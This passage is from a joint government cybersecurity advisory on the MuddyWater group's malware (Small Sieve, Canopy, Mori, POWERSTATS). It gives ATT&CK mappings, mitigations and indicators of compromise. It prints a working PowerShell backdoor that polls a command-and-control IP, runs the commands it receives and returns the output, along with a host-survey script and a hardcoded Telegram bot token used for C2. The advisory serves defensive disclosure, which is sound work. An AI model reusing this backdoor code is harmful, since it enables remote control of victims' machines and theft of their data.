Small Sieve provides basic functionality required to maintain and expand a foothold in victim infrastructure and avoid detection [TA0005] by using custom string and traffic obfuscation schemes together with the Telegram Bot application programming interface (API). Specifically, Small Sieve’s beacons and taskings are performed using Telegram API over Hypertext Transfer Protocol Secure (HTTPS) [T1071.001], and the tasking and beaconing data is obfuscated through a hex byte swapping encoding scheme combined with an obfuscated Base64 function [T1027], T1132.002].

Note: cybersecurity agencies in the United Kingdom and the United States attribute Small Sieve to MuddyWater with high confidence. 

See Appendix B for further analysis of Small Sieve malware.

Canopy

MuddyWater also uses Canopy/Starwhale malware, likely distributed via spearphishing emails with targeted attachments [T1566.001]. According to two Canopy/Starwhale samples analyzed by CISA, Canopy uses Windows Script File (.wsf) scripts distributed by a malicious Excel file. Note: the cybersecurity agencies of the United Kingdom and the United States attribute these malware samples to MuddyWater with high confidence. 

In the samples CISA analyzed, a malicious Excel file, Cooperation terms.xls, contained macros written in Visual Basic for Applications (VBA) and two encoded Windows Script Files. When the victim opens the Excel file, they receive a prompt to enable macros [T1204.002]. Once this occurs, the macros are executed, decoding and installing the two embedded Windows Script Files.

The first .wsf is installed in the current user startup folder [T1547.001] for persistence. The file contains hexadecimal (hex)-encoded strings that have been reshuffled [T1027]. The file executes a command to run the second .wsf.

The second .wsf also contains hex-encoded strings that have been reshuffled. This file collects [TA0035] the victim system’s IP address, computer name, and username [T1005]. The collected data is then hex-encoded and sent to an adversary-controlled IP address, http[:]88.119.170[.]124, via an HTTP POST request [T1041].

Mori

MuddyWater also uses the Mori backdoor that uses Domain Name System tunneling to communicate with the group’s C2 infrastructure [T1572]. 

According to one sample analyzed by CISA, FML.dll, Mori uses a DLL written in C++ that is executed with regsvr32.exe with export DllRegisterServer; this DLL appears to be a component to another program. FML.dll contains approximately 200MB of junk data [T1001.001] in a resource directory 205, number 105. Upon execution, FML.dll creates a mutex, 0x50504060, and performs the following tasks:

  • Deletes the file FILENAME.old and deletes file by registry value. The filename is the DLL file with a .old extension.
  • Resolves networking APIs from strings that are ADD-encrypted with the key 0x05.
  • Uses Base64 and Java Script Object Notation (JSON) based on certain key values passed to the JSON library functions. It appears likely that JSON is used to serialize C2 commands and/or their results.
  • Communicates using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag, for C2 [T1071.001].
  • Reads and/or writes data from the following Registry Keys, HKLM\Software\NFC\IPA and HKLM\Software\NFC\(Default).

POWERSTATS

This group is also known to use the POWERSTATS backdoor, which runs PowerShell scripts to maintain persistent access to the victim systems [T1059.001]. 

CNMF has posted samples further detailing the different parts of MuddyWater’s new suite of tools— along with JavaScript files used to establish connections back to malicious infrastructure—to the malware aggregation tool and repository, Virus Total. Network operators who identify multiple instances of the tools on the same network should investigate further as this may indicate the presence of an Iranian malicious cyber actor.

MuddyWater actors are also known to exploit unpatched vulnerabilities as part of their targeted operations. FBI, CISA, CNMF, and NCSC-UK have observed this APT group recently exploiting the Microsoft Netlogon elevation of privilege vulnerability (CVE-2020-1472) and the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688). See CISA’s Known Exploited Vulnerabilities Catalog for additional vulnerabilities with known exploits and joint Cybersecurity Advisory: Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities for additional Iranian APT group-specific vulnerability exploits.

Survey Script

The following script is an example of a survey script used by MuddyWater to enumerate information about victim computers. It queries the Windows Management Instrumentation (WMI) service to obtain information about the compromised machine to generate a string, with these fields separated by a delimiter (e.g., ;; in this sample). The produced string is usually encoded by the MuddyWater implant and sent to an adversary-controlled IP address.

$O = Get-WmiObject Win32_OperatingSystem;$S = $O.Name;$S += “;;”;$ips = “”;Get-WmiObject Win32_NetworkAdapterConfiguration -Filter “IPEnabled=True” | % {$ips = $ips + “, ” + $_.IPAddress[0]};$S += $ips.substring(1);$S += “;;”;$S += $O.OSArchitecture;$S += “;;”;$S += [System.Net.DNS]::GetHostByName(”).HostName;$S += “;;”;$S += ((Get-WmiObject Win32_ComputerSystem).Domain);$S += “;;”;$S += $env:UserName;$S += “;;”;$AntiVirusProducts = Get-WmiObject -Namespace “root\SecurityCenter2” -Class AntiVirusProduct  -ComputerName $env:computername;$resAnti = @();foreach($AntiVirusProduct in $AntiVirusProducts){$resAnti += $AntiVirusProduct.displayName};$S += $resAnti;echo $S;

Newly Identified PowerShell Backdoor

The newly identified PowerShell backdoor used by MuddyWater below uses a single-byte Exclusive-OR (XOR) to encrypt communications with the key 0x02 to adversary-controlled infrastructure. The script is lightweight in functionality and uses the InvokeScript method to execute responses received from the adversary.

function encode($txt,$key){$enByte = [Text.Encoding]::UTF8.GetBytes($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$encodetxt = [Convert]::ToBase64String($enByte);return $encodetxt;}function decode($txt,$key){$enByte = [System.Convert]::FromBase64String($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$dtxt = [System.Text.Encoding]::UTF8.GetString($enByte);return $dtxt;}$global:tt=20;while($true){try{$w = [System.Net.HttpWebRequest]::Create(‘http://95.181.161.49:80/index.php?id=<victim identifier>’);$w.proxy = [Net.WebRequest]::GetSystemWebProxy();$r=(New-Object System.IO.StreamReader($w.GetResponse().GetResponseStream())).ReadToEnd();if($r.Length -gt 0){$res=[string]$ExecutionContext.InvokeCommand.InvokeScript(( decode $r 2));$wr = [System.Net.HttpWebRequest]::Create(‘http://95.181.161.49:80/index.php?id=<victim identifier>’);$wr.proxy = [Net.WebRequest]::GetSystemWebProxy();$wr.Headers.Add(‘cookie’,(encode $res 2));$wr.GetResponse().GetResponseStream();}}catch {}Start-Sleep -Seconds $global:tt;}

MITRE ATT&CK Techniques

MuddyWater uses the ATT&CK techniques listed in table 1.

Table 1: MuddyWater ATT&CK Techniques[2]

Technique Title ID Use
Reconnaissance
Gather Victim Identity Information: Email Addresses T1589.002 MuddyWater has specifically targeted government agency employees with spearphishing emails.
Resource Development
Acquire Infrastructure: Web Services T1583.006 MuddyWater has used file sharing services including OneHub to distribute tools.
Obtain Capabilities: Tool T1588.002 MuddyWater has made use of legitimate tools ConnectWise and RemoteUtilities for access to target environments.
Initial Access
Phishing: Spearphishing Attachment T1566.001 MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments. 
Phishing: Spearphishing Link T1566.002 MuddyWater has sent targeted spearphishing emails with malicious links.
Execution
Windows Management Instrumentation T1047 MuddyWater has used malware that leveraged Windows Management Instrumentation for execution and querying host information.
Command and Scripting Interpreter: PowerShell T1059.001 MuddyWater has used PowerShell for execution.
Command and Scripting Interpreter: Windows Command Shell 1059.003 MuddyWater has used a custom tool for creating reverse shells.
Command and Scripting Interpreter: Visual Basic T1059.005 MuddyWater has used Virtual Basic Script (VBS) files to execute its POWERSTATS payload, as well as macros.
Command and Scripting Interpreter: Python T1059.006 MuddyWater has used developed tools in Python including Out1. 
Command and Scripting Interpreter: JavaScript T1059.007 MuddyWater has used JavaScript files to execute its POWERSTATS payload.
Exploitation for Client Execution T1203 MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.
User Execution: Malicious Link T1204.001 MuddyWater has distributed URLs in phishing emails that link to lure documents.
User Execution: Malicious File T1204.002 MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.
Inter-Process Communication: Component Object Model T1559.001 MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.
Inter-Process Communication: Dynamic Data Exchange T1559.002 MuddyWater has used malware that can execute PowerShell scripts via Dynamic Data Exchange.
Persistence
Scheduled Task/Job: Scheduled Task T1053.005 MuddyWater has used scheduled tasks to establish persistence.
Office Application Startup: Office Template Macros T1137.001 MuddyWater has used a Word Template, Normal.dotm, for persistence.
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 MuddyWater has added Registry Run key KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding to establish persistence. 
Privilege Escalation
Abuse Elevation Control Mechanism: Bypass User Account Control  T1548.002 MuddyWater uses various techniques to bypass user account control.
Credentials from Password Stores T1555 MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email.
Credentials from Web Browsers

T1555.003

MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.
Defense Evasion
Obfuscated Files or Information T1027 MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.
Steganography T1027.003 MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.
Compile After Delivery T1027.004 MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code.
Masquerading: Match Legitimate Name or Location T1036.005 MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender. E.g., Small Sieve uses variations of Microsoft (Microsift) and Outlook in its filenames to attempt to avoid detection during casual inspection.
Deobfuscate/Decode Files or Information

T1140

MuddyWater decoded Base64-encoded PowerShell commands using a VBS file.
Signed Binary Proxy Execution: CMSTP

T1218.003

MuddyWater has used CMSTP.exe and a malicious .INF file to execute its POWERSTATS payload.
Signed Binary Proxy Execution: Mshta T1218.005 MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.
Signed Binary Proxy Execution: Rundll32 T1218.011 MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.
Execution Guardrails T1480 The Small Sieve payload used by MuddyWater will only execute correctly if the word “Platypus” is passed to it on the command line.
Impair Defenses: Disable or Modify Tools T1562.001 MuddyWater can disable the system’s local proxy settings.
Credential Access
OS Credential Dumping: LSASS Memory T1003.001 MuddyWater has performed credential dumping with Mimikatz and procdump64.exe.
OS Credential Dumping: LSA Secrets

T1003.004

MuddyWater has performed credential dumping with LaZagne.
OS Credential Dumping: Cached Domain Credentials T1003.005 MuddyWater has performed credential dumping with LaZagne.
Unsecured Credentials: Credentials In Files

T1552.001

MuddyWater has run a tool that steals passwords saved in victim email.
Discovery 
System Network Configuration Discovery T1016 MuddyWater has used malware to collect the victim’s IP address and domain name.
System Owner/User Discovery T1033 MuddyWater has used malware that can collect the victim’s username.
System Network Connections Discovery T1049 MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine.
Process Discovery T1057 MuddyWater has used malware to obtain a list of running processes on the system.
System Information Discovery

T1082

MuddyWater has used malware that can collect the victim’s OS version and machine name.
File and Directory Discovery T1083 MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords “Kasper,” “Panda,” or “ESET.”
Account Discovery: Domain Account T1087.002 MuddyWater has used cmd.exe net user/domain to enumerate domain users.
Software Discovery T1518 MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.
Security Software Discovery T1518.001 MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.
Collection
Screen Capture T1113 MuddyWater has used malware that can capture screenshots of the victim’s machine.

Archive Collected Data: Archive via Utility

T1560.001 MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.
Command and Control
Application Layer Protocol: Web Protocols T1071.001 MuddyWater has used HTTP for C2 communications. e.g., Small Sieve beacons and tasking are performed using the Telegram API over HTTPS.
Proxy: External Proxy T1090.002

MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. 

MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to C2.

Web Service: Bidirectional Communication T1102.002 MuddyWater has used web services including OneHub to distribute remote access tools.
Multi-Stage Channels T1104 MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.
Ingress Tool Transfer T1105 MuddyWater has used malware that can upload additional files to the victim’s machine.
Data Encoding: Standard Encoding T1132.001 MuddyWater has used tools to encode C2 communications including Base64 encoding.
Data Encoding: Non-Standard Encoding T1132.002 MuddyWater uses tools such as Small Sieve, which employs a custom hex byte swapping encoding scheme to obfuscate tasking traffic.
Remote Access Software  T1219 MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally.
Exfiltration
Exfiltration Over C2 Channel T1041 MuddyWater has used C2 infrastructure to receive exfiltrated data.

 

Mitigations

Protective Controls and Architecture

  • Deploy application control software to limit the applications and executable code that can be run by users. Email attachments and files downloaded via links in emails often contain executable code. 

Identity and Access Management

  • Use multifactor authentication where possible, particularly for webmail, virtual private networks, and accounts that access critical systems. 
  • Limit the use of administrator privileges. Users who browse the internet, use email, and execute code with administrator privileges make for excellent spearphishing targets because their system—once infected—enables attackers to move laterally across the network, gain additional accesses, and access highly sensitive information. 

Phishing Protection

  • Enable antivirus and anti-malware software and update signature definitions in a timely manner. Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via spearphishing. 
  • Be suspicious of unsolicited contact via email or social media from any individual you do not know personally. Do not click on hyperlinks or open attachments in these communications.
  • Consider adding an email banner to emails received from outside your organization and disabling hyperlinks in received emails.
  • Train users through awareness and simulations to recognize and report phishing and social engineering attempts. Identify and suspend access of user accounts exhibiting unusual activity.
  • Adopt threat reputation services at the network device, operating system, application, and email service levels. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spearphishing attacks. 

Vulnerability and Configuration Management

Additional Resources

  • For more information on Iranian government-sponsored malicious cyber activity, see CISA’s webpage – Iran Cyber Threat Overview and Advisories and CNMF’s press release – Iranian intel cyber suite of malware uses open source tools
  • For information and resources on protecting against and responding to ransomware, refer to StopRansomware.gov, a centralized, whole-of-government webpage providing ransomware resources and alerts.
  • The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: Technical Approaches to Uncovering and Remediating Malicious Activity provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
  • CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.
  • The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.

References

[1] CNMF Article: Iranian Intel Cyber Suite of Malware Uses Open Source Tools
[2] MITRE ATT&CK: MuddyWater 

Caveats

The information you have accessed or received is being provided “as is” for informational purposes only. The FBI, CISA, CNMF, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, CISA, CNMF, or NSA.

Purpose

This document was developed by the FBI, CISA, CNMF, NCSC-UK, and NSA in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. The United States’ NSA agrees with this attribution and the details provided in this report.

Appendix A: IOCs

The following IP addresses are associated with MuddyWater activity:

5.199.133[.]149
45.142.213[.]17    
45.142.212[.]61
45.153.231[.]104 
46.166.129[.]159 
80.85.158[.]49 
87.236.212[.]22
88.119.170[.]124 
88.119.171[.]213
89.163.252[.]232
95.181.161[.]49
95.181.161[.]50
164.132.237[.]65
185.25.51[.]108
185.45.192[.]228 
185.117.75[.]34
185.118.164[.]21
185.141.27[.]143
185.141.27[.]248 
185.183.96[.]7
185.183.96[.]44
192.210.191[.]188
192.210.226[.]128

Appendix B: Small Sieve

Note: the information contained in this appendix is from NCSC-UK analysis of a Small Sieve sample.

Metadata

Table 2: Gram.app.exe Metadata

Filename gram_app.exe 
Description NSIS installer that installs and runs the index.exe backdoor and adds a persistence registry key 
Size 16999598 bytes 
MD5 15fa3b32539d7453a9a85958b77d4c95 
SHA-1 11d594f3b3cf8525682f6214acb7b7782056d282 
SHA-256 b75208393fa17c0bcbc1a07857686b8c0d7e0471d00a167a07fd0d52e1fc9054 
Compile Time 2021-09-25 21:57:46 UTC 

 

Table 3: Index.exe Metadata

Filename  index.exe 
Description The final PyInstaller-bundled Python 3.9 backdoor 
Size 17263089 bytes 
MD5 5763530f25ed0ec08fb26a30c04009f1 
SHA-1 2a6ddf89a8366a262b56a251b00aafaed5321992 
SHA-256 bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2  
Compile Time 2021-08-01 04:39:46 UTC 

 

Functionality 

Installation 

Small Sieve is distributed as a large (16MB) NSIS installer named gram_app.exe, which does not appear to masquerade as a legitimate application. Once executed, the backdoor binary index.exe is installed in the user’s AppData/Roaming directory and is added as a Run key in the registry to enabled persistence after reboot. 

The installer then executes the backdoor with the “Platypus” argument [T1480], which is also present in the registry persistence key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift

Configuration 

The backdoor attempts to restore previously initialized session data from %LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt

If this file does not exist, then it uses the hardcoded values listed in table 4:

Table 4: Credentials and Session Values

Field  Value Description
Chat ID 2090761833  This is the Telegram Channel ID that beacons are sent to, and, from which, tasking requests are received. Tasking requests are dropped if they do not come from this channel. This value cannot be changed. 
Bot ID Random value between 10,000,000 and 90,000,000  This is a bot identifier generated at startup that is sent to the C2 in the initial beacon. Commands must be prefixed with /com[Bot ID] in order to be processed by the malware.
Telegram Token  2003026094: AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY  This is the initial token used to authenticate each message to the Telegram Bot API.

 

Tasking 

Small Sieve beacons via the Telegram Bot API, sending the configured Bot ID, the currently logged-in user, and the host’s IP address, as described in the Communications (Beacon format) section below. It then waits for tasking as a Telegram bot using the python-telegram-bot module. 

Two task formats are supported: 

  • /start – no argument is passed; this causes the beacon information to be repeated. 
  • /com[BotID] [command] – for issuing commands passed in the argument. 

The following commands are supported by the second of these formats, as described in table 5: 

Table 5: Supported Commands

Command Description
delete  This command causes the backdoor to exit; it does not remove persistence. 
download url””filename  The URL will be fetched and saved to the provided filename using the Python urllib module urlretrieve function.  
change token””newtoken  The backdoor will reconnect to the Telegram Bot API using the provided token newtoken. This updated token will be stored in the encoded MicrosoftWindowsOutlookDataPlus.txt file. 
disconnect  The original connection to Telegram is terminated. It is likely used after a change token command is issued. 

 

Any commands other than those detailed in table 5 are executed directly by passing them to cmd.exe /c, and the output is returned as a reply.

Defense Evasion 

Anti-Sandbox 

Figure 1: Execution Guardrail

Threat actors may be attempting to thwart simple analysis by not passing “Platypus” on the command line. 

String obfuscation 

Internal strings and new Telegram tokens are stored obfuscated with a custom alphabet and Base64-encoded. A decryption script is included in Appendix B.

Communications 

Beacon Format 

Before listening for tasking using CommandHandler objects from the python-telegram-bot module, a beacon is generated manually using the standard requests library:

Figure 2: Manually Generated Beacon

The hex host data is encoded using the byte shuffling algorithm as described in the “Communications (Traffic obfuscation)” section of this report. The example in figure 2 decodes to: 

admin/WINDOMAIN1 | 10.17.32.18

 
Traffic obfuscation 

Although traffic to the Telegram Bot API is protected by TLS, Small Sieve obfuscates its tasking and response using a hex byte shuffling algorithm. A Python3 implementation is shown in figure 3.

 

Figure 3: Traffic Encoding Scheme Based on Hex Conversion and Shuffling

 

Detection 

Table 6 outlines indicators of compromise.
 

Table 6: Indicators of Compromise

Type Description Values
Path Telegram Session Persistence File (Obfuscated)  %LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt 
Path Installation path of the Small Sieve binary  %AppData%\OutlookMicrosift\index.exe 
Registry value name Persistence Registry Key pointing to index.exe with a “Platypus” argument HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift 

 

String Recover Script

Figure 4: String Recovery Script

Contact Information

To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field-offices, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [email protected]. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [email protected]. For NSA client requirements or general cybersecurity inquiries, contact the Cybersecurity Requirements Center at [email protected]. United Kingdom organizations should report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or for urgent assistance call 03000 200 973.

Revisions

February 24, 2022: Initial Version

Source…